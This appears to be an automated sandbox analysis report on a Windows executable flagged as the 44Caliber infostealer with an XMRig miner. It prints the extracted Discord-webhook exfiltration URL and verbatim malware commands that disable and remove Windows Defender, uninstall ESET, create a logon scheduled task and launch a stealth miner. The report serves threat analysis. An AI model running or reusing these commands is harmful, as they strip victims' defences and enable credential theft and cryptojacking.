Analysis
-
max time kernel
35s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
25-12-2023 13:44
General
-
Target
22bae033c46d71990197f17a981ce3c9.exe
-
Size
2.3MB
-
MD5
22bae033c46d71990197f17a981ce3c9
-
SHA1
ce5488cd3d40e42917c7bb1c642da4b7817248d0
-
SHA256
620b5b24add3610dadb6d18e4a52f1fa3c6cb5686dac389b655be6ffb1ef62e5
-
SHA512
3a9448ca3b0b3074eaae4f0803f9d8522d19e5f0bbe222131a64543f374bf8658c8f9c0c08b2136bdc54439bc039e03fa4f61284aae26e15515790487731abd5
-
SSDEEP
49152:9T1KUWNK6HkvoHKbtaU0fG9sFbI3TWdhswrlEkj1vi25m:h49gqkvFZZ0fZsjWdhswrxj15
Score
10/10
Malware Config
Extracted
Family
44caliber
C2
https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5
Signatures
-
44Caliber
An open source infostealer written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 19 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 16 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\22bae033c46d71990197f17a981ce3c9.exe"C:\Users\Admin\AppData\Local\Temp\22bae033c46d71990197f17a981ce3c9.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend4⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI4⤵
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet4⤵
-
C:\Users\Admin\AppData\Local\Temp\3E2C3176-49A1-4ECC-ADFF-9AEB7DF35482\dismhost.exeC:\Users\Admin\AppData\Local\Temp\3E2C3176-49A1-4ECC-ADFF-9AEB7DF35482\dismhost.exe {745192CC-FC01-4856-B91F-771C386BFCB0}5⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall4⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend5⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WinDefend5⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI5⤵
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall5⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend5⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WinDefend5⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI5⤵
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet5⤵
-
C:\Users\Admin\AppData\Local\Temp\66552BD4-46F3-4B75-A188-7A19821F1F24\dismhost.exeC:\Users\Admin\AppData\Local\Temp\66552BD4-46F3-4B75-A188-7A19821F1F24\dismhost.exe {841C4890-A15B-43B2-82B7-6A48BF3D3E86}6⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall5⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend6⤵
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WinDefend6⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender6⤵
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Insidious.exe"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
440B
MD53a4efe132b702ae9c21a8d53715d6ba1
SHA1abffa5dd1aa86f17ec0b943527f0720ce5b7995c
SHA256409348d5acc18132d5fa8f257402639a21837221270427b4ac1b165879df0951
SHA512f1a9b4ccd63b3238e34ec49a43ad275c74407aab10ba1469477907e0075552827e2602ce7479fc7675061bf5bd9ca94bb9547c8e18c0f3eebb6bef8de350ebb7
-
Filesize
94KB
MD59a821d8d62f4c60232b856e98cba7e4f
SHA14ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5
SHA256a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525
SHA5121b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3
-
Filesize
274KB
MD598851f9b3a0194a53f26c8d5da31b4c8
SHA18ba83d9220a991c7a190f0c312eb8cee9197e7b0
SHA2562b2fc85878d79634dd37270508473cf44d14513ac58ce60c5506973f3c95255a
SHA5129cf9141f25b0852e3e7aacfcbb7fe7458694c6297bc47e1f7203ad710615858743d84e4e757f4cc38fad83e97450e6f18ab0a7824b77104c78d393dca3a4ad01
-
Filesize
2.2MB
MD505c2064ebb4a3843acca2b5546765486
SHA128c94d8bf7227ce33ee65d93836b2eab4f410331
SHA256694278b58b49d1918e6f5d5d4f5dfc1217bf135bfab3e051d05c8aaa4fb7f271
SHA51227375ffe855615c008f00350816efd5233e17088a5aa04e5e3e30d57644c5d21ed59d4cf9e28d3ea33c491486aa4c7128bc5a1283403d33d32057d4ca4d73c8e
-
Filesize
7KB
MD5b1ef2adc59605464f993ae4ae19965b6
SHA14d61861692960dc0aba2302fd04d8c9294d3b53b
SHA2562a5d982af6c724187a2fea965909d9b955a75048a76a19e56657997484173908
SHA512f17d41fa484daece87c45e59ee06c8cc49ce635202fc4dff860992a09dbfea89fb13a8f9439f637963e6903ce5ae25555b2a47257ff8e97d426a6b255827507f
-
Filesize
1.9MB
MD559d61f1d74ee36474220fc6e678ebb2b
SHA17a8eb053424eaa7bd31634fce9dc5a8b3b7ca00e
SHA256ca1f61af0aed8ad77e9f936857614640b168fd1ee18ad8c5d2ba1346dcb06860
SHA512bd59ec90c6f66987ec9e14aaca06580679e6c7d5e782fa4eb88ec8fa3a6eac429ca7be7e755af2f826f3f4464aa8afb66fd0a46e6ce7b19a2ee1e298e171e0a5
-
Filesize
176KB
MD54762bae4c8d7e1a9a7accdb9c263e1de
SHA1fadc61af24d479a4a8651c59f2890affb6886139
SHA256bc273afdeaa7951debbfa1392fe226a38cf89a3fd5b379ce156b7b395ff182f9
SHA5127ee83b080806034d453ff9382b7c65e828e8ec62888cf3a6420be37a40b9519c3f80a41b30893b59d4aef90445a75a2e57e9ecddfdb1b70e844c630e35a7ba17
-
Filesize
17KB
MD5f8f848e3792f47b86ac397288fa3f8d7
SHA17c4371e46bab5b65d893cacedd03eca1fa33a72b
SHA2565108a3c3f21488e613fc543c900fcc9874e10677621389573f049bd92fab6061
SHA512b2371a5109662b975a80839bdc14d1605e310425d56d42058ac5dbc69c7538dc208f175c5025b6646590e4e4826e286ab794cfc01b9d38fbb1db098ca1229c0a
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
412KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
2.3MB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
128KB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
4KB
-
Filesize
7.3MB
-
Filesize
7.3MB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
296KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
2.1MB
-
Filesize
9.9MB
-
Filesize
512KB
-
Filesize
2.2MB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB